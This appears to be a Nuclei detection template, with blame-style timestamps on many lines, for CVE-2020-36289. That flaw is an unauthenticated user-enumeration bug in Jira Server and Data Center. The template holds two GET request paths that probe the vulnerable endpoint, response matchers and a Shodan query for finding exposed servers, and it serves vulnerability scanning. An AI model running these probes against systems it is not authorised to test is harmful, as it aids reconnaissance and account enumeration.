2021-06-09 15:43:52 +00:00
id : CVE-2020-36289
info :
2023-04-04 19:19:39 +00:00
name : Jira Server and Data Center - Information Disclosure
2021-06-09 15:43:52 +00:00
author : dhiyaneshDk
severity : medium
2023-04-04 19:19:39 +00:00
description : Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can gain access to sensitive information, potentially leading to further attacks.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://twitter.com/ptswarm/status/1402644004781633540
2022-05-17 09:18:12 +00:00
- https://jira.atlassian.com/browse/JRASERVER-71559
2023-04-04 19:19:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-36289
2023-07-11 19:49:27 +00:00
cwe-id : CWE-863
2023-11-07 14:54:31 +00:00
epss-score : 0.91152
2023-12-12 11:07:52 +00:00
epss-percentile : 0.98597
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*
2022-07-04 13:17:36 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : atlassian
product : data_center
2023-09-06 12:22:36 +00:00
shodan-query : http.component:"Atlassian Jira"
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,jira,atlassian,unauth
2021-06-09 15:43:52 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-09 15:43:52 +00:00
- method : GET
path :
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
2021-06-14 15:50:25 +00:00
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
2021-06-09 15:43:52 +00:00
2022-09-28 06:00:58 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-06-09 15:43:52 +00:00
matchers-condition : and
matchers :
- type : word
2022-09-28 06:00:58 +00:00
part : body
2021-06-09 15:43:52 +00:00
words :
- 'rel=\"admin\"'
- type : word
2022-09-28 06:00:58 +00:00
part : header
2021-06-09 15:43:52 +00:00
words :
- 'application/json'
2022-09-28 06:00:58 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 490a00463044022007e05ca594a28f65eba65a4cd1535db8fbad197cb6d2665e8affafc7fa37ccbe02207e1adadf386b1e885e757dea81bd8d6b18e4b8f1a639b0f5108a6499b74727a3:922c64590222798bb761d5b6d8e72950